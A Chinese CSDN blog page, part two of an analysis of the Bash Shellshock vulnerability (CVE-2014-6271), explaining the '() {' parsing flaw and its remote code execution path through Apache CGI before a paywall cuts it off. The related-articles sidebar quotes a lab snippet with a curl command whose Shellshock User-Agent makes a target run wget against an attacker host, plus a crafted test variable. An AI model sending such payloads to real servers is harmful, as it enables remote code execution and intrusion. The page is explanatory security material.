bash破壳漏洞分析(二)

最新推荐文章于 2024-05-28 13:53:41 发布
最新推荐文章于 2024-05-28 13:53:41 发布
阅读量2k 收藏 1
点赞数 2
分类专栏: 漏洞 文章标签: 漏洞 bash 破壳漏洞 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaofeiNO1/article/details/55212204
版权
本文详细介绍了Bash破壳漏洞,分析了漏洞的定义、影响及数据包特征。通过环境变量的特殊构造,该漏洞可能导致远程代码执行。文章通过实例展示了如何构造探测数据包,并讨论了漏洞的影响,包括SSH、Apache CGI和DHCP客户端等场景。
摘要由CSDN通过智能技术生成

1. Bash简介

1.1 定义

   Bash(GNU Bourne-Again Shell)是许多Linux发行版的默认Shell。

1.2 概述

   目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“() {”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。
   从阐述的漏洞原理可知,漏洞的根本原因存在于Bash的ENV命令实现上,因此漏洞本身是不能够直接导致远程代码执行的。如果达到远程代码执行的目的,必须要借助第三方服务程序作为媒介才能够实现,第三方服务程序也必须要满足众多条件才可以充当此媒介的角色。目前自己已验证第三方服务程序apache2便可充当此媒介,其CGI组件满足远程访问并调用Bash的ENV命令进行访问数据解析功能。具体如何实现,参见下面的原理图:CVE-2014-6271漏洞实现远程代码执行原理图。

2. 数据包分析

   Bash远程代码执行漏洞主要是以“() {”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。所以在数据包的payload构造时我们需要构造一个以“() {”开头的环境变量以及一段可执行的shell脚本。通过python将请求数据发送至服务器,Apache的cgi组件远程访问并调用Bash的ENV命令进行访问数据解析功能,执行payload脚本。

2.1 探测数据包

   具体流程如下:

  • 在含有破壳漏洞的bash版本的虚拟机(Ubuntu12.04)中对Apac
最低0.47元/天 解锁文章
fly小灰灰
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞的原理与利用
weixin_54992237的博客
10-15 223
使用ssh登录蠕虫发起者主机(10.1.1.231),执行下面三条命令。命令执行结果如下图所示。 [root@worm-master ~]# tail /var/log/httpd/access_log [root@worm-master ~]# curl -A “() { :; }; /usr/bin/wget http://10.1.1.231/shock” http://10.1.1.12/test.cgi [root@worm-master ~]# tail /var/log/httpd/ac
安鸾之RCE系列
柠鹿的轨迹
08-28 810
0x00 webshell&中国菜刀 0o00 题目提示 0o01 执行过程 0x01 命令执行01 0o00 题目提示 0o01 Linux命令符 0o02 执行过程 0x02 漏洞 0o00 题目提示 0o01 ShellShock 0o01 执行过程 0x03 PHPmailer 0o00 题目提示 0o01 phpMailer 0o02 执行过程 0x04 命令执行02 0o00 题目提示 0o01 DNSlog 0o01 执行过程...
Bash Bug(漏洞,Shellshock) - CVE-2014-6271
最新发布
HaSaKing的博客
05-28 520
漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
漏洞(CVE-2014-6271)综合分析:“漏洞系列分析之二
chengfangang的专栏
10-25 1414
一、“漏洞概述 我们团队于9月25日10时发布了《“漏洞(CVE-2014-6271)综合分析》,并更新了多个版本。在这个过程中,我们的监测采集和样本交换体系发现了大量利用该漏洞的扫描攻击、后门投放等行为,并发现了多个与此漏洞相关的恶意代码。 二、网络数据包 基于漏洞的特点,我们利用与高校联合部署的“探云“体系等进行了流量监测。发现了捕获了部分网络攻击行为,下面列举一个攻击包进行
漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2974
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
vulhub漏洞复现之bash(Shellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1248
Shellshock 漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
bash漏洞分析(一)
fly小灰灰的专栏
02-15 3837
1. 简介   bash远程代码执行漏洞,该漏洞会影响目前主流的Linux和Mac OSX操作系统平台,包括但不限于Redhat,CentOS,Ubuntu,Debian,Fedora,Amaron Linux,OSX10.10等平台。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与bash交互的多种应用,包括HTTP,OpenSSH,DHCP等。    针对本次漏洞的检测,需
漏洞修复步骤
10-10
漏洞,又称为Shellshock漏洞,是一个严重的安全漏洞,影响了广泛使用的Bash shell。这个漏洞在2014年被发现,允许攻击者通过精心构造的环境变量注入恶意代码,从而控制受感染的系统。Bash是Unix和Linux系统中的...
BASH(漏洞)Redhat系统检测和修补
10-16
**BASH(漏洞)详解** BASH,全称Bourne-Again SHell,是Linux和类UNIX系统中默认的命令行解释器,是用户与操作系统交互的重要工具。2014年,一个名为"Shellshock"的安全漏洞BASH中被发现,这被称为"BASH漏洞...
SUSE11.1漏洞补丁
10-09
SUSE11.1漏洞补丁 bash-3.2-147.20.1.x86_64.rpm
漏洞(ShellShock)官方修补补丁(2014.10.05)
10-13
修补了包括CVE-2014-6271(最原始的漏洞)、CVE-2014-7169、CVE-2014-7186、CVE-2014-7187、CVE-2014-6277和CVE-2014-6278。这些Bash漏洞现在都是漏洞集中的,目前所有补丁,截止2014.10.05的官方补丁已经全部修补完成。压缩包内有一个检测脚本,只针对前几个流传广泛的6271、7169、7186等检测,后面几个没有检测。感兴趣的可以试一试。没有积分的可以去官网下载,这个是官方补丁整理后的,适合下载手动修补研究的。修补命令为: for BP in `ls bash43-*|grep -v sig`; do patch -p0 < $BP; done ./configure sudo make sudo make install
漏洞(CVE-2014-6271)综合分析1
08-04
漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
漏洞最新linux补丁把谁4.3
10-08
漏洞(Shellshock)是2014年发现的一个严重的Linux和Unix系统安全漏洞,影响了广泛使用的Bash shell。Bash是GNU项目的一部分,是Linux和类Unix操作系统中的命令行解释器,用于处理用户输入的命令。这个漏洞允许...
漏洞(shellshock)RHEL 4(32位)补丁
10-13
[root@localhost ~]# rpm -Uvh --force bash-3.0-27.0.2.el4.i386.rpm warning: bash-3.0-27.0.2.el4.i386.rpm: V3 DSA signature: NOKEY, key ID b38a8516 Preparing... ########################################...
漏洞综合系列分析(word2013 可编辑版)
10-29
在第二部分的分析中,我们将更深入地讨论“漏洞的具体利用方式,以及如何通过实际示例来理解其工作原理。此外,还将提供更详尽的缓解策略和最佳实践,帮助读者更好地理解和防范这种类型的漏洞
Bash漏洞
weixin_33911824的博客
07-30 217
”是一个严重漏洞的别名,在Red Hat、CentOS、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10中均拥有存在CVE-2014-6271(即“漏洞漏洞Bash版本,同时由于Bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X,而针对这些操作系统管理下...
bash漏洞反弹shell
3569
07-29 4821
0x00 漏洞原理在bash里边输入~ export name='() { echo "inside name";}; echo "outside name";'查看环境变量~ env|grep name ~ name=() { echo "inside name";}; echo "outside name";这时你会发现当进入子shell的时候,直接输出 outside name~ bas
深入探索高级Bash脚本编程指南
高级Bash Shell脚本教程是一份全面深入探讨Shell脚本艺术的珍贵参考资料。该指南由Mendel Cooper编写,旨在帮助用户提升在Bash shell编程方面的技能。Bash是Unix/Linux系统中的命令解释器,广泛用于自动化任务和系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值